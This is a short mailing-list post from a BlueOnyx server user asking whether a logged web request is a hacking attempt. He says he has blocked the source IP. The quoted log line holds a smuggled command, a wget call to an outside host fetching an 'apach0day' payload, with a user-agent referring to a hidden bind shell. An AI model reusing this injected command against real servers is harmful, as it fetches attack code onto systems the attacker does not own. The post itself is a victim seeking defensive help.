[BlueOnyx:15724] Hacking attempt?
Alan Kline
alan at snugglebunny.us
Wed Jul 30 11:19:45 -05 2014
I've seen a number of entries on my system log that look similar to this:
alan.snugglebunny.us 162.253.66.77 - - [28/Jul/2014:17:07:22 -0500] "GET
/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day;
HTTP/1.0" 200 14 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
I've firewalled the IP address using iptables--is there anything I need
to be concerned about, or anything else I should do?
Alan
More information about the Blueonyx
mailing list